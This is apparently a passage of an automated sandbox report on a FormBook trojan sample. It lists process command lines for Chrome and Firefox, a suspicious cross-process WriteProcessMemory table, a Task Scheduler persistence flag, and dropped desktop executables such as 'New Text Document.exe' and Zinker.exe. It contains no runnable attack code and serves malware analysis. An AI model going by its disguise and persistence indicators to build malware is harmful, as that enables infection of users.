N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3804 wrote to memory of 5040 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 5040 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 1916 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4724 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4724 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3804 wrote to memory of 4440 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Trojan;MSIL.FormBook.AFO!MTB.zip

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffa32479758,0x7ffa32479768,0x7ffa32479778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1528 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1800 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2064 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2848 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2856 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4476 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4732 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4884 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4632 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3732 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5292 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5340 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5708 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4544 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2848 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=5832 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5944 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5956 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=2848 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5340 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:2

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.0.280848563\1217111273" -parentBuildID 20221007134813 -prefsHandle 1644 -prefMapHandle 1632 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {92e6bdc9-b913-497c-8298-a724051eefe8} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 1764 15ab06d9658 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.1.896227359\412794860" -parentBuildID 20221007134813 -prefsHandle 2108 -prefMapHandle 2104 -prefsLen 20828 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e6809d7-a544-47d0-9de9-aa877af2d4c1} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 2120 15a9e372e58 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.2.66154676\1372941166" -childID 1 -isForBrowser -prefsHandle 2916 -prefMapHandle 2912 -prefsLen 20931 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9aa64511-71f5-4f1b-8807-2c15bf968488} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 2928 15ab49b8e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.3.1208108574\1549940450" -childID 2 -isForBrowser -prefsHandle 3556 -prefMapHandle 3548 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {178bfbd6-b52f-43a6-989d-8b23cf966a84} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 3576 15a9e362858 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.4.1371313256\1474636843" -childID 3 -isForBrowser -prefsHandle 3820 -prefMapHandle 3832 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8db92546-ef2e-4810-84a7-121732b348e7} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 4232 15ab64daf58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.5.156863461\836313384" -childID 4 -isForBrowser -prefsHandle 4916 -prefMapHandle 4932 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {78274ca6-c6e4-421d-ad2b-2934d8bf75b8} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 4920 15ab6b35458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.6.1987216237\990034726" -childID 5 -isForBrowser -prefsHandle 4076 -prefMapHandle 4780 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e960f707-cc3e-46b3-9ff1-d2c56cbb9221} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 4800 15ab6e34158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.7.639963897\1816187699" -childID 6 -isForBrowser -prefsHandle 5248 -prefMapHandle 5252 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf484619-8866-4be7-93af-8bb9472819c7} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 5240 15ab6e34458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.8.31428178\389520191" -childID 7 -isForBrowser -prefsHandle 5712 -prefMapHandle 5700 -prefsLen 26249 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ac8857c5-d46a-412b-8895-d3e59bec4e39} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 5692 15ab80f6658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.9.1563856582\428995992" -childID 8 -isForBrowser -prefsHandle 5876 -prefMapHandle 5896 -prefsLen 26424 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {daf8f5bf-e8a9-4530-a489-079235b9921e} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 5904 15ab8306b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.10.42344726\1681559120" -childID 9 -isForBrowser -prefsHandle 6304 -prefMapHandle 6116 -prefsLen 26736 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c37f111f-f6b3-4bcc-b7d1-2bae20a84200} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 6288 15ab9325c58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.11.282918134\83439983" -childID 10 -isForBrowser -prefsHandle 4596 -prefMapHandle 4604 -prefsLen 26736 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {11660dd8-2d05-45ed-b28a-dc4aad89f50b} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 4588 15a9e361658 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.12.468851195\1591198171" -childID 11 -isForBrowser -prefsHandle 5232 -prefMapHandle 5228 -prefsLen 26773 -prefMapSize 233444 -jsInitHandle 1312 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e04a932-e30f-4a1a-a0e7-0176851ddfad} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 5704 15ab495b058 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.13.1436948097\307149363" -parentBuildID 20221007134813 -prefsHandle 10196 -prefMapHandle 10184 -prefsLen 26773 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6419c4cd-989f-4047-9a55-c9c8f1da9c40} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 5244 15a9e32d558 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2856.14.1189028784\1495184372" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 10036 -prefMapHandle 10040 -prefsLen 26773 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7b44daed-b1a5-4a29-a9f1-945e9127653b} 2856 "\\.\pipe\gecko-crash-server-pipe.2856" 6260 15ab9bd3258 utility

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=1780,i,13423298475056094201,3426577635652403702,131072 /prefetch:8

C:\Users\Admin\Desktop\New Text Document.exe

"C:\Users\Admin\Desktop\New Text Document.exe"

C:\Users\Admin\Desktop\a\volumeinfo.exe

"C:\Users\Admin\Desktop\a\volumeinfo.exe"

C:\Users\Admin\Desktop\a\Zinker.exe

"C:\Users\Admin\Desktop\a\Zinker.exe"

C:\Users\Admin\Desktop\a\smartsoftsignew.exe

